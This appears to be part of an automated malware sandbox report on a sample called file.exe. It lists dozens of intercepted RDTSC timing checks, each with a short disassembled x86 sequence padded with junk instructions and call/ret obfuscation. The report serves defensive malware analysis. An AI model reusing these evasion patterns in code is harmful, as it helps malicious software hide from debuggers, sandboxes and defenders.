    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 590CBF second address: 590CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F764878255Eh 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58F990 second address: 58F996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58FB1C second address: 58FB20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58F644 second address: 58F65E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F7648CE84F5h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58F65E second address: 58F665 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58F665 second address: 58F671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58F671 second address: 58F675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58F675 second address: 58F695 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7648CE84EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push ebx 0x00000012 jo 00007F7648CE84E6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58F695 second address: 58F69D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 590331 second address: 59037B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7648CE84F7h 0x00000009 jnl 00007F7648CE84E6h 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F7648CE84EDh 0x00000016 jmp 00007F7648CE84F3h 0x0000001b jnp 00007F7648CE84E6h 0x00000021 popad 0x00000022 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59037B second address: 590385 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F7648782556h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 590385 second address: 5903CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7648CE84F6h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7648CE84F1h 0x00000012 jmp 00007F7648CE84F6h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 590540 second address: 590562 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7648782566h 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007F764878255Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 jno 00007F7648782556h 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5909B4 second address: 5909B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5909B8 second address: 5909C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 594C4D second address: 594C5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F7648CE84E6h 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 594C5C second address: 594C60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 594C60 second address: 594C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 594C6E second address: 594C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnl 00007F764878255Ah 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 550A14 second address: 550A66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 jnc 00007F7648CE84F3h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F7648CE84E8h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 sub dword ptr [ebp+122D1DE1h], edx 0x0000002d mov edx, ebx 0x0000002f lea eax, dword ptr [ebp+124807DBh] 0x00000035 nop 0x00000036 pushad 0x00000037 push edi 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 550A66 second address: 550A6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 550A6E second address: 537982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 jg 00007F7648CE84F4h 0x0000000d jmp 00007F7648CE84EEh 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F7648CE84E8h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d or ecx, 1AED2D21h 0x00000033 jmp 00007F7648CE84EEh 0x00000038 call dword ptr [ebp+122D3140h] 0x0000003e jmp 00007F7648CE84EAh 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push edx 0x00000048 pop edx 0x00000049 push ebx 0x0000004a pop ebx 0x0000004b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 550B9B second address: 550BA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 550BA1 second address: 550BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551025 second address: 3A3D28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jg 00007F7648782556h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 or cl, FFFFFFB0h 0x00000014 xor edx, dword ptr [ebp+122D2EE6h] 0x0000001a push dword ptr [ebp+122D04A9h] 0x00000020 mov ecx, eax 0x00000022 mov ecx, dword ptr [ebp+122D2CD0h] 0x00000028 call dword ptr [ebp+122D1CC0h] 0x0000002e pushad 0x0000002f mov dword ptr [ebp+122D3A07h], ebx 0x00000035 xor eax, eax 0x00000037 jmp 00007F7648782561h 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 pushad 0x00000041 xor edx, dword ptr [ebp+122D2B68h] 0x00000047 jmp 00007F7648782561h 0x0000004c popad 0x0000004d mov dword ptr [ebp+122D2C74h], eax 0x00000053 cld 0x00000054 mov esi, 0000003Ch 0x00000059 mov dword ptr [ebp+122D3A07h], eax 0x0000005f add esi, dword ptr [esp+24h] 0x00000063 pushad 0x00000064 mov dword ptr [ebp+122D3A07h], ecx 0x0000006a mov esi, 079570A0h 0x0000006f popad 0x00000070 stc 0x00000071 lodsw 0x00000073 cmc 0x00000074 add eax, dword ptr [esp+24h] 0x00000078 mov dword ptr [ebp+122D1CB1h], esi 0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 jne 00007F764878255Ch 0x00000088 nop 0x00000089 pushad 0x0000008a pushad 0x0000008b push eax 0x0000008c push edx 0x0000008d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5510BF second address: 5510DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7648CE84F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5510DE second address: 55110A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 54474432h 0x0000000e jmp 00007F7648782564h 0x00000013 push 2221E2EAh 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c pop edx 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55127E second address: 5512C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7648CE84F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F7648CE84E8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 mov edi, 42E8E2E0h 0x0000002b nop 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5512C4 second address: 5512C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5513C8 second address: 5513D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7648CE84EBh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5513D7 second address: 55140A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F764878255Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d jmp 00007F764878255Ch 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 jng 00007F7648782562h 0x0000001c jng 00007F764878255Ch 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551475 second address: 55147F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F7648CE84E6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55147F second address: 551483 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551590 second address: 551594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551594 second address: 55159E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7648782556h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55159E second address: 5515C6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a jg 00007F7648CE84ECh 0x00000010 pop esi 0x00000011 nop 0x00000012 push 00000004h 0x00000014 mov cx, 8C00h 0x00000018 push eax 0x00000019 je 00007F7648CE84F4h 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5515C6 second address: 5515CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551DA2 second address: 551DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7648CE84ECh 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551DB7 second address: 551DCA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F764878255Bh 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551DCA second address: 551E39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F7648CE84E8h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D2A8Bh], ebx 0x00000028 xor ecx, 26F0AE1Bh 0x0000002e lea eax, dword ptr [ebp+1248081Fh] 0x00000034 push 00000000h 0x00000036 push ebx 0x00000037 call 00007F7648CE84E8h 0x0000003c pop ebx 0x0000003d mov dword ptr [esp+04h], ebx 0x00000041 add dword ptr [esp+04h], 00000017h 0x00000049 inc ebx 0x0000004a push ebx 0x0000004b ret 0x0000004c pop ebx 0x0000004d ret 0x0000004e or dword ptr [ebp+122D1DE1h], ebx 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 jng 00007F7648CE84ECh 0x0000005d jnl 00007F7648CE84E6h 0x00000063 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551E39 second address: 538449 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d lea eax, dword ptr [ebp+124807DBh] 0x00000013 add dword ptr [ebp+122D1DE1h], edi 0x00000019 sub dword ptr [ebp+122D1C68h], ecx 0x0000001f push eax 0x00000020 push ebx 0x00000021 jmp 00007F764878255Fh 0x00000026 pop ebx 0x00000027 mov dword ptr [esp], eax 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d call 00007F7648782558h 0x00000032 pop eax 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 add dword ptr [esp+04h], 0000001Ch 0x0000003f inc eax 0x00000040 push eax 0x00000041 ret 0x00000042 pop eax 0x00000043 ret 0x00000044 call dword ptr [ebp+122D1DADh] 0x0000004a push eax 0x0000004b push edx 0x0000004c jnp 00007F764878255Eh 0x00000052 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59821B second address: 598221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 598221 second address: 59824E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F7648782562h 0x0000000d jmp 00007F7648782562h 0x00000012 popad 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5984A9 second address: 5984AF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5984AF second address: 5984BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F7648782556h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 598A1C second address: 598A27 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jbe 00007F7648CE84E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 598B69 second address: 598B6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B907 second address: 59B90B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B90B second address: 59B922 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jbe 00007F7648782556h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B922 second address: 59B92B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B92B second address: 59B932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B932 second address: 59B938 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BDD5 second address: 59BDDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BDDD second address: 59BDE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BDE1 second address: 59BDED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BDED second address: 59BDF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E0B4 second address: 59E0B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E0B8 second address: 59E0D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7648CE84F8h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E0D9 second address: 59E0DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A3BF2 second address: 5A3C21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F7648CE84F3h 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F7648CE84EFh 0x00000016 popad 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A33B1 second address: 5A33CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7648782567h 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A33CD second address: 5A33FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F7648CE84F8h 0x0000000a jmp 00007F7648CE84F2h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A3546 second address: 5A354B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A62E1 second address: 5A62E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A66F5 second address: 5A66FF instructions: 0x00000000 rdtsc 0x00000002 js 00007F7648782556h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A66FF second address: 5A674E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F7648CE84F7h 0x00000008 pop edi 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jo 00007F7648CE84E6h 0x00000012 push edi 0x00000013 pop edi 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F7648CE84EAh 0x0000001f jmp 00007F7648CE84F9h 0x00000024 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A674E second address: 5A6764 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F764878255Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A6764 second address: 5A6768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A6768 second address: 5A6797 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F764878255Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F7648782568h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC2A2 second address: 5AC2A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AAC27 second address: 5AAC34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AAC34 second address: 5AAC55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F7648CE84E6h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F7648CE84F4h 0x00000011 popad 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AADF7 second address: 5AADFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AADFE second address: 5AAE22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 je 00007F7648CE84E6h 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F7648CE84F1h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB1D4 second address: 5AB1D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB1D8 second address: 5AB1E2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7648CE8502h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB344 second address: 5AB348 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5517E2 second address: 5517E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ABFCF second address: 5ABFD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ABFD3 second address: 5ABFD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B405C second address: 5B4060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B21DE second address: 5B2206 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7648CE84F2h 0x00000008 push ebx 0x00000009 jno 00007F7648CE84E6h 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jng 00007F7648CE84ECh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B2206 second address: 5B220A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
